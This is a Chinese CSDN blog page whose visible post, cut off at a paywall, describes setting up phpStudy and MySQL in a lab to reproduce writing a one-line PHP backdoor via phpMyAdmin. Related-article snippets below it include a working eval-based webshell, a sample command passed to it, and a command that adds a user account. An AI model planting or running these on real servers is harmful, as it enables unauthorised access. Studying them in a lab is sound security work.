(三)phpstudy下开启mysql,运用phpmyadmin管理执行sql语句,写入一句话后门getshell。

最新推荐文章于 2023-04-06 22:19:03 发布
最新推荐文章于 2023-04-06 22:19:03 发布
阅读量3.6k 收藏 6
点赞数
文章标签: mysql phpstudy phpmyadmin getshell 一句话后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32434307/article/details/86489411
版权

学习mysql数据库漏洞整理过程中,想复现phpmyadmin写入一句话后门getshell的过程遇到很多问题。phpmyadmin是很多网站用来管理数据库的一个系统,尤其是mysql数据库管理的较多。phpmyadmin实现mysql数据库的管理,采用phpstudy实现较为方便。过程出现较多障碍,一步步走向成功,记录。

1 启动phpstudy,出现mysql无法启动的问题

因为之前已经装过Mysql,并使用过。因此要关闭mysql数据库,并且要把系统服务里面的MySQL删除,留下MySQLa服务。

以管理员运行cmd,在cmd命令行下输入:

sc delete mysql    

2 在通过报错等方式获取phpmyadmin绝对路径后,出现#1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement。

原因是没有开通导入此路径的权限。通过SHOW VARIABLES LIKE "secure_file_priv";查询

因此,我们需要开通此权限在,打开磁盘下PhpStudy\PHPTutorial\MySQL\my.ini文件,修改Secure File Priv。

可以参考一下:

(1)不允许MySQL进行导入导出<

最低0.47元/天 解锁文章
爱上卿Ooo
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
getshell思路
Bu2n的博客
02-23 5699
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
文件上传一句木马getshell
qq_41620273的博客
12-25 5529
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
PHP文件包含漏洞代码分析-通过漏洞getshell-学习笔记
ZhangAweio的博客
04-06 694
假设我们有一个网站有上传漏洞,但我们并不能进行直接getshell,这时候我们就用到这漏洞来进行getshell假如我们有个网站已经成功上传shell 了,但是无法运行,因为是其他格式的那么我们可以通过文件包含漏洞来进行getshell首先写入一句木马成功访问不是PHP结尾的文件,文件包含漏洞危害及其大,如有被利用不堪设想。
phpstudy mysql日志_(实战)phpstudy的漏洞+数据库日志写shell
weixin_33162568的博客
01-28 458
——真正的才智是刚毅的志向。今天没学多少东西,直到下午在看别人的文章的时候看到了phpstudy0day的关键词,好奇就查了查。其实这个洞有一段时间了,然后就准备google试试还能不能找到有洞的网站,直接google搜phpstudy 探针 2014。结果是这样的 ,我不得不感叹google太强了。前几页我就不打算看了,基本上已经被日穿了,或者洞补了。所以干脆向后面翻,说实运气很重要,我刚尝试...
渗透测试-文件包含漏洞
lza20001103的博客
04-27 1607
文件包含漏洞
Windows系统下解决PhPStudy MySQL启动失败问题
01-10
打开系统自带的资源管理器,查看监听端口3306是不是被占用,下图中3306端口被mysqld.exe占用,mysqld.exe是phpstudy自带的mysql服务,如果非mysqld.exe占用了3306,那么可以跟着下面的步骤去关闭。 打开系统自带的...
phpstudy Apache PHP MySQL phpMyAdmin ZendOptimizer
12-14
phpMyAdmin 3.2.2 开源、基于WEB而小巧的MySQL管理程序。 ZendOptimizer 3.3.3 免费的PHP优化引擎,性能提高30%以上。 OpenSSL 0.9.8k 密码算法库、SSL协议库以及应用程序。 3、如果作为服务器请稍修改配置文件...
完美解决phpstudy安装后mysql无法启动(无需删除原数据库,无需更改任何配置,无需更改端口)直接共存
09-09
- 打开文件管理器,找到原有的MySQL数据文件夹。 - 复制该文件夹中的所有文件,然后导航到PHPStudyMySQL目录。 - 在PHPStudyMySQL目录中,选择“替换”选项来覆盖现有文件。 - 重启PHPStudy,此时系统应能...
phpStudy 最新 Apache+Nginx+LightTPD+PHP+MySQL+phpMyAdmin+Zend 稳定 强大
05-12
该程序包集成最新的Apache+Nginx+LightTPD+PHP+MySQL+phpMyAdmin+Zend Optimizer+Zend Loader,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序绿色小巧简易迷你仅有35M,有专门的控制面板。...
使用PHP制作简单的一句木马与PHP中文乱码问题
weixin_59872639的博客
12-03 2863
phpstudy的根目录下创建一个php文件 然后右键使用编译器打开文件 输入一句木马后保存 <?php @eval($_GET['cmd']); ?> 这是一个使用GET请求头的一句木马,运用的函数为eval() 使用浏览器打开这个php 在搜索栏后面输入 ?cmd=system('ipconfig'); 可以看到,木马已经成功执行 这次使用post请求方法尝试一下 使用post请求方法需要用...
mysql写入木马getshell总结
orange777
02-25 5301
1、select into outfile写入木马 2、SQL语句利用日志写shell 3、sqlmap写入一句getshell
关于phpstudy集成环境中phpmyadmin的相关配置
qq_38938670的博客
02-19 8090
一、phpstudy包括2种数据库管理工具,分别是phpMyAdminMySQL_Font,如下: 当点击phpmyadmin时需要进行登录,此时需要对配置文件config.default.php先进行相关配置 ,如下: 二、config.default.php的所在位置及配置: 1、首先找到phpmyadmin文件夹,在找到libraries文件夹,找到config.default....
phpsudy的mysql管理器_phpstudy安装数据库管理工具phpMyAdmin
weixin_30699957的博客
02-05 1447
phpstudy可以使用数据库管理工具phpMyAdmin管理MYSQLphpmyadmin一般自动安装位于安装目录下,如www/localhost,根目录与程序文件同级。phpmyadmin需要进行登录,此时需要对配置文件config.default.php先进行相关配置 ,如下:libraries文件夹下config.default.php的配置:1、首先找到phpmyadmin文件夹,找...
phpstudy搭建sql lab进行sql注入的学习,搭建实验室的详细操作
m0_64898960的博客
03-11 2178
详细教你用phpstudy搭建sql注入靶场
phpstudy_pro链接SqlServer数据库
有一个程序员的博客
06-25 1339
系统环境:WNMPwindows 2008Rphpstudy_pro 8.1.1.2PHP 7.0.9业务场景:php请求Sqlserver数据库获取信息进行登录操作。1、下载扩展4.0 安装https://www.microsoft.com/en-us/download/details.aspx?id=200982、运行扩展安装向导,找到php扩展目录ext,确认安装sqlserv扩展3、确定安装扩展 4、在ext目录内找到SQLSRV_Readme并打开,根据提示选择要开启的扩展 注意:这一步新版php
phpstudy操作sql server相关经验
weixin_30697239的博客
12-17 221
phpstudy操作sql server相关经验 1.去官网http://www.phpstudy.net/下载并安装phpstudy 2.修改php.ini配置文件如下: mssql.secure_connection = onextension=php...
初识数据库
前端程序员辉哥的博客
10-12 193
数据库的基本概念 什么是数据库 数据库(database)是用来组织、存储和管理数据的仓库 为了方便管理互联网世界中的数据,就有了数据库管理系统的概念(简称:数据库)。用户可以对数据库中的数据进行新增、查询、更新、删除等操作 常见的数据库以及分类 常见的数据库分类下面几种 MySQL 数据库(目前使用最广泛、流行度最高的开源免费数据库;Community + Enterprise) Oracle 数据库(收费) SQL Server 数据库(收费) ...
phpstudy 8.1.1.3运行MySQL(之前未安装MySQL
m0_72166786的博客
08-10 834
仅适用于之前未安装MySQL的情况
我本地是phpstudy搭建的mysql环境,怎么用py写一个监控sql执行的脚本,我执行啥就让他输出在窗口,就比如说我在本地搭建了一个网站,点首页执行了一些sql语句,我想要py去得到我执行了啥sql语句
最新发布
06-08
你可以使用Python的MySQLdb模块来连接MySQL数据库,然后使用它提供的cursor对象来执行SQL语句并获取结果。 以下是一个基本的例子: ```python import MySQLdb # 连接数据库 conn = MySQLdb.connect( host='...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱上卿Ooo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值